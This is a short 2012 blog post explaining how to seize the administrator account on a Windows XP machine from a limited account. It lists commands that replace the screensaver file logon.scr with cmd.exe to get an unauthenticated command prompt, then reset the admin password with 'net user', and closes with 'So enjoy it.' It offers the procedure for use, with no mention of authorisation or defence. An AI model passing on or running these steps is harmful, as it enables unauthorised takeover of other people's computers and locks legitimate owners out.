Wednesday 19 December 2012

How to hack windows XP admin password


If you are given access to the limited account only on a system. Then definitely you can’t access many features of that pc. But, don’t worry I have a trick to hack the admin password of that pc. At first open up a dos prompt then follow these sets of commands:

cd\ *drops to root
cd\windows\system32 *directs to the system32 dir
mkdir temphack *creates the folder temphack
copy logon.scr temphack\logon.scr *backsup logon.scr
copy cmd.exe temphack\cmd.exe *backsup cmd.exe
del logon.scr *deletes original logon.scr
rename cmd.exe logon.scr *renames cmd.exe to logon.scr
exit *quits dos

Now what you have just done is told the computer to backup the command program and the screen saver file, then edits the settings so when the machine boots the screen saver you will get an unprotected dos prompt without logging into XP. Once this happens if you enter this command minus the quotes

"net user <admin account name here> password"

If the Administrator Account is called Peter and you want the password Alex enter this

"net user Peter Alex"

This will change the password on Peter machine to Alex and no you have full access to this computer. So enjoy it.


No comments:

Post a Comment